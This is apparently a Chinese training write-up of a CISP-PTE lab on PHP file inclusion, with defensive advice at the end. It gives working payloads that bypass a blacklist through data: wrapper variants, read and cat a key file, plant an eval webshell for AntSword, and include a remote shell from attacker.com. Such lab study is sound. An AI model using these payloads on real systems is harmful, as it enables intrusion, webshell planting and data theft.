PHP文件包含漏洞渗透测试实战与防御

1. 文件包含漏洞渗透测试概述

文件包含漏洞是Web安全领域中常见的高危漏洞类型，主要存在于使用动态文件包含机制的PHP应用中。当开发者使用include、require等函数时，如果未对用户输入进行严格过滤，攻击者就能通过构造特殊参数读取系统敏感文件或执行任意代码。

在CISP-PTE认证考试中，文件包含是必考的核心知识点之一。本次靶场模拟了典型的文件包含漏洞场景，目标是通过多种技术手段获取存储在key.php文件中的flag值。下面我将从渗透准备、漏洞利用、源码分析三个维度，详细解析9种不同的渗透方法。

2. 渗透环境准备

2.1 靶场环境初始化

靶场首页明确提示存在PHP文件包含风险："PHP文件包含风险的产生原因是在通过PHP的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。"

初始访问URL为：

code复制http://fd06f791.clsadp.com/start/index.php?page=hello

观察发现，无论输入什么参数，服务器都会自动添加.txt扩展名。例如：

• 输入hello → 实际访问hello.txt
• 输入mooyuan → 实际访问mooyuan.txt

这种强制添加扩展名的机制是开发者设置的第一道防线，但正如我们将在后续步骤中看到的，这种防护可以被多种方式绕过。

2.2 基础探测与分析

首先测试标准data协议的直接使用：

code复制data://text/plain,<?php phpinfo();?>

返回结果为空，说明系统对"data://"这个完整协议标识进行了过滤。

通过查阅PHP官方文档可知，PHP的文件流包装器具有很好的容错性，以下形式都能被识别为data协议：

1. 标准形式：data://text/plain,test
2. 单斜杠：data:/text/plain,test
3. 无斜杠：data:text/plain,test
4. 双写混淆：data:data:////text/plain,test

这种特性为我们后续的绕过尝试提供了理论基础。

3. data协议绕过技术实战

3.1 单斜杠绕过法

使用单斜杠形式的payload：

code复制data:/text/plain,<?php phpinfo();?>

成功执行phpinfo()函数，证明系统未过滤这种变体形式。phpinfo页面的输出为我们提供了服务器环境的关键信息，包括：

• PHP版本（影响漏洞利用方式）
• 已加载的扩展模块
• 服务器文件系统路径

3.2 无斜杠绕过法

同样有效的无斜杠形式：

code复制data:text/plain,<?php phpinfo();?>

这种形式更加简洁，完全避开了对"data://"的字符串匹配。

3.3 双写混淆绕过技术

当简单的变体也被过滤时，可以采用双写混淆技术：

code复制data:data:////text/plain,<?php phpinfo();?>

原理是：如果过滤逻辑只是简单替换"data://"为空，那么双写后的字符串经过过滤会变成"data://text/plain"，仍然保持有效。这种技术在SQL注入等场景也很常见。

4. 多种flag获取方法详解

4.1 直接文件读取技术

4.1.1 readfile函数读取

code复制data:/text/plain,<?php readfile('../key.php');?>

readfile()函数直接输出文件内容，是最简单的文件读取方式。注意使用../进行路径穿越，因为key.php位于上级目录。

4.1.2 system命令执行

code复制data:/text/plain,<?php system('cat ../key.php');?>

通过system函数调用系统命令cat，这种方法的特点是：

• 输出会包含在HTML注释中
• 需要查看页面源码才能看到完整结果
• 也可以通过BurpSuite等工具直接查看原始响应

4.1.3 highlight_file高亮显示

code复制data:/text/plain,<?php highlight_file('../key.php');?>

highlight_file函数会以语法高亮形式显示源代码，视觉效果更友好，适合快速定位关键信息。

4.2 木马连接技术

4.2.1 一句话木马植入

code复制data:text/plain,<?php @eval($_POST[ljn]);?>

这个payload会在服务器上创建一个webshell，可以通过POST参数"ljn"执行任意PHP代码。

4.2.2 蚁剑连接实战

中国蚁剑是一款流行的webshell管理工具，连接步骤如下：

1. 右键添加数据
2. URL填写包含webshell的地址
3. 连接密码设置为"ljn"
4. 文件系统类型选择"PHP"
5. 成功连接后可浏览服务器文件系统

通过蚁剑可以直接查看/编辑key.php文件，这是最直观的flag获取方式。

5. 源码分析与漏洞原理

5.1 黑名单过滤机制分析

通过蚁剑获取的源码显示，系统采用了多重过滤：

php复制$page=str_replace("php://", "", $page);
$page=str_replace("file://", "", $page);
// ...共过滤11种协议
$page= $page . ".txt";  // 强制添加扩展名

这种过滤方式存在三个根本缺陷：

1. 黑名单机制不完整（未过滤http://等协议）
2. 字符串替换可被双写绕过
3. 协议识别逻辑不够严格

5.2 安全加固建议

开发层面应该：

1. 使用白名单机制，只允许特定目录下的特定文件
2. 严格验证输入格式（如正则表达式匹配）
3. 禁用危险函数（如eval）
4. 设置open_basedir限制文件访问范围

6. 远程文件包含技术

6.1 木马脚本构造

创建一个包含GIF文件头的PHP脚本：

code复制GIF89a <?php echo "mooyuan"; @eval($_POST['ljn']); ?>

文件头欺骗可以绕过某些简单的文件类型检查。

6.2 远程包含执行

通过http协议包含远程服务器上的脚本：

code复制http://fd06f791.clsadp.com/start/index.php?page=http://attacker.com/shell.txt

然后通过POST传递执行命令：

code复制ljn=system('cat /var/www/key.php');

7. 防御与加固实践

7.1 开发防护措施

1. 使用绝对路径而非相对路径
2. 设置php.ini中的安全配置：

   ini复制allow_url_include = Off
   allow_url_fopen = Off
   

3. 实时更新PHP版本，修复已知漏洞

7.2 运维监控建议

1. 部署WAF拦截可疑请求
2. 定期审计服务器文件变更
3. 监控异常文件访问行为

8. 渗透测试方法论总结

完整的文件包含漏洞测试流程应包括：

1. 基础功能分析（参数传递方式、扩展名处理等）
2. 本地文件包含测试（LFI）
3. 远程文件包含测试（RFI）
4. 各种协议包装器测试
5. 编码/混淆绕过尝试
6. 日志文件污染测试
7. 会话文件包含测试

9. 实战经验与技巧

1. 使用BurpSuite的Intruder模块可以批量测试各种协议变体
2. PHP的封装协议在不同版本有差异，测试前应先确认版本
3. 当直接包含失败时，可以尝试包含日志文件（如/var/log/apache2/access.log）
4. 在受限环境下，可以尝试包含/proc/self/environ等特殊文件
5. 使用base64编码有时能绕过某些过滤机制

文件包含漏洞的渗透测试需要结合具体环境特点，灵活运用各种技术手段。通过本次靶场练习，我们系统性地掌握了9种不同的利用方法，这些技术在真实渗透测试场景中都具有实用价值。